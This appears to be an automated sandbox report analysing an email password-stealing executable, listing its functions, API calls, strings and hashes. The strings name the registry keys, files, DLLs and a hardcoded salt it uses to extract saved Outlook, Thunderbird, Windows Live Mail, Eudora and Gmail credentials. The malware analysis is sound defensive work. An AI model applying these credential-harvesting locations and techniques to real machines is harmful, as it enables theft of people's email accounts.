memset sprintf SendMessageA 34076 410bbc 34079 4109cf 34076->34079 34080 4109dc 34079->34080 34081 410a23 memset GetPrivateProfileStringA 34080->34081 34082 4109ea memset 34080->34082 34087 407646 strlen 34081->34087 34092 4075cd sprintf memcpy 34082->34092 34085 410a0c WritePrivateProfileStringA 34086 410a65 34085->34086 34088 40765a 34087->34088 34089 40765c 34087->34089 34088->34086 34091 4076a3 34089->34091 34093 40737c strtoul 34089->34093 34091->34086 34092->34085 34093->34089 34274 40b5bf memset memset _mbsicmp

                                                                                                                  Executed Functions

                                                                                                                  Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040832F
                                                                                                                  • memset.MSVCRT ref: 00408343
                                                                                                                  • memset.MSVCRT ref: 0040835F
                                                                                                                  • memset.MSVCRT ref: 00408376
                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                  • strlen.MSVCRT ref: 004083E9
                                                                                                                  • strlen.MSVCRT ref: 004083F8
                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                  • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                  • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                  Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 453 407f3f-407f44 451->453 454 407f46-407f74 strlen * 2 452->454 455 407f3a call 407f90 452->455 453->454 457 407f89-407f8f 453->457 458 407f83 454->458 459 407f76-407f81 call 4070e3 454->459 455->453 461 407f86-407f88 458->461 459->461 461->457
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                  • strlen.MSVCRT ref: 00407F5C
                                                                                                                  • strlen.MSVCRT ref: 00407F64
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                  • String ID: ACD
                                                                                                                  • API String ID: 379999529-620537770
                                                                                                                  • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                  • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                  Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00401E8B
                                                                                                                  • strlen.MSVCRT ref: 00401EA4
                                                                                                                  • strlen.MSVCRT ref: 00401EB2
                                                                                                                  • strlen.MSVCRT ref: 00401EF8
                                                                                                                  • strlen.MSVCRT ref: 00401F06
                                                                                                                  • memset.MSVCRT ref: 00401FB1
                                                                                                                  • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                  • memset.MSVCRT ref: 00402003
                                                                                                                  • sprintf.MSVCRT ref: 00402030
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • memset.MSVCRT ref: 00402086
                                                                                                                  • memset.MSVCRT ref: 0040209B
                                                                                                                  • strlen.MSVCRT ref: 004020A1
                                                                                                                  • strlen.MSVCRT ref: 004020AF
                                                                                                                  • strlen.MSVCRT ref: 004020E2
                                                                                                                  • strlen.MSVCRT ref: 004020F0
                                                                                                                  • memset.MSVCRT ref: 00402018
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                  • API String ID: 1846531875-4223776976
                                                                                                                  • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                  • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                  Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76270A60,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404AB8
                                                                                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404ADE
                                                                                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                  • API String ID: 745651260-375988210
                                                                                                                  • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                  • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                  Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                  Strings
                                                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                  • pstorec.dll, xrefs: 00403C30
                                                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                  • API String ID: 1197458902-317895162
                                                                                                                  • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                  • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                  Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                  • String ID: h4ND
                                                                                                                  • API String ID: 3662548030-3825183422
                                                                                                                  • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                  • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                  • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                  • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                  Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                  • API String ID: 2768085393-1693574875
                                                                                                                  • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                  • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                  Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044430B
                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                  • memset.MSVCRT ref: 00444379
                                                                                                                  • memset.MSVCRT ref: 00444394
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                  • strlen.MSVCRT ref: 004443DB
                                                                                                                  • _strcmpi.MSVCRT ref: 00444401
                                                                                                                  Strings
                                                                                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                  • Store Root, xrefs: 004443A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                  • API String ID: 832325562-2578778931
                                                                                                                  • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                  • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                  Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F567
                                                                                                                  • memset.MSVCRT ref: 0040F57F
                                                                                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2012582556-3916222277
                                                                                                                  • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                  • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                  Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004037EB
                                                                                                                  • memset.MSVCRT ref: 004037FF
                                                                                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • strchr.MSVCRT ref: 0040386E
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                  • strlen.MSVCRT ref: 00403897
                                                                                                                  • sprintf.MSVCRT ref: 004038B7
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                  • String ID: %s@yahoo.com
                                                                                                                  • API String ID: 317221925-3288273942
                                                                                                                  • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                  • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                  Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
